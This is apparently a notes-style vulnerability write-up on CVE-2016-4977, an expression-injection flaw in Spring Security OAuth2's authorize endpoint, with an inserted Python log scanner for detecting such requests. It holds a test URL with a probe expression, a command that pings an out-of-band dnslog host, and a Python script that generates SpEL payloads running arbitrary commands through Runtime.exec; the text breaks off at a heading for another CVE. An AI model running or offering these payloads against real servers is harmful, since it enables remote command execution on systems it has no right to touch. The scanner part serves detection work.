1. Spring Security OAuth2.0 (CVE-2016-4977)
This vulnerability is in Spring Security OAuth2.0: after a successful login, a response_type that does not exist is reflected into the Whitelabel Error Page, where it is evaluated as an EL expression (expression language injection).
Test address: http://127.0.0.1:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
This is the default path when using Spring Security OAuth2.0.
The inconvenient part is that you must log in successfully first; otherwise the request fails at authentication.
Let's look at executing the command "ping 0hb8tu.dnslog.cn".
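As an added defender-side example (not part of the original post): a small Python scanner that flags /oauth/authorize requests whose query parameters carry an EL expression like the ${233*233} probe in the test address above. The access-log lines are constructed; only the path and parameter names come from the test URL.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not captured from a real host.
# Line 2 carries the page's ${233*233} probe, line 3 a T(java.lang.Runtime) expression.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /oauth/authorize?response_type=code&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 302 0
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /oauth/authorize?response_type=%24%7B233*233%7D&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 400 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /oauth/authorize?response_type=%24%7BT(java.lang.Runtime).getRuntime()%7D&client_id=acme HTTP/1.1" 400 600
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /login HTTP/1.1" 200 1024
"""

# Groups: client, timestamp, method, request target, status code
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) ')
# Markers of an expression rather than a plain response_type token: the ${...} template
# delimiters, SpEL's T() type operator, and Runtime method chains.
SPEL_MARKERS = re.compile(r'\$\{|\bT\(\s*java\.|\.getRuntime\(|\.exec\(', re.IGNORECASE)


def is_suspicious_value(value: str) -> bool:
    """True if a query parameter value looks like an EL/SpEL expression."""
    decoded = unquote(unquote(value))  # also catches double-encoded payloads
    return SPEL_MARKERS.search(decoded) is not None


def scan_line(line: str):
    """Return (client, parameter, decoded value) for a suspicious /oauth/authorize request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _ts, _method, target, _status = m.groups()
    parts = urlsplit(target)
    if not parts.path.startswith('/oauth/authorize'):
        return None
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:  # parse_qs has already URL-decoded once
            if is_suspicious_value(value):
                return (client, param, unquote(value))
    return None


def scan_log(text: str):
    """Scan a whole log and return every hit in order of appearance."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == '__main__':
    for client, param, value in scan_log(SAMPLE_LOG):
        print(f'{client}: expression in {param}: {value}')
```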
Script to generate the poc:
#!/usr/bin/env python3
# Spell the command out character by character as Character.toString(...).concat(...) calls
message = input('Enter message to encode: ')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
    poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)
Instructions:
Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)